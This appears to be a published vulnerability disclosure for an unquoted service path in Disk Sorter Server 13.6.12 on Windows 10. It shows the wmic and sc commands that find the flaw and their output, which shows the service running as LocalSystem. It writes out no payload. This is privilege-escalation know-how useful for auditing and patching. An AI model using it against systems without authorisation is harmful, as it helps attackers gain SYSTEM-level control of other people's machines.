31 lines
No EOL
1.1 KiB
Text
31 lines
No EOL
1.1 KiB
Text
# Exploit Title: Disk Sorter Server 13.6.12 - 'Disk Sorter Server' Unquoted Service Path
|
|
# Discovery by: BRushiran
|
|
# Date: 15-06-2021
|
|
# Vendor Homepage: https://www.disksorter.com
|
|
# Software Links: https://www.disksorter.com/setups_x64/disksortersrv_setup_v13.6.12_x64.exe
|
|
# Tested Version: 13.6.12
|
|
# Vulnerability Type: Unquoted Service Path
|
|
# Tested on: Windows 10 Enterprise 64 bits
|
|
|
|
# Step to discover Unquoted Service Path:
|
|
|
|
C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
|
|
|findstr /i /v "c:\windows\\" |findstr /i /v """
|
|
|
|
Disk Sorter Server Disk Sorter Server C:\Program Files\Disk Sorter
|
|
Server\bin\disksrs.exe Auto
|
|
|
|
C:\>sc qc "Disk Sorter Server"
|
|
[SC] QueryServiceConfig CORRECTO
|
|
|
|
NOMBRE_SERVICIO: Disk Sorter Server
|
|
TIPO : 10 WIN32_OWN_PROCESS
|
|
TIPO_INICIO : 2 AUTO_START
|
|
CONTROL_ERROR : 0 IGNORE
|
|
NOMBRE_RUTA_BINARIO: C:\Program Files\Disk Sorter
|
|
Server\bin\disksrs.exe
|
|
GRUPO_ORDEN_CARGA :
|
|
ETIQUETA : 0
|
|
NOMBRE_MOSTRAR : Disk Sorter Server
|
|
DEPENDENCIAS :
|
|
NOMBRE_INICIO_SERVICIO: LocalSystem |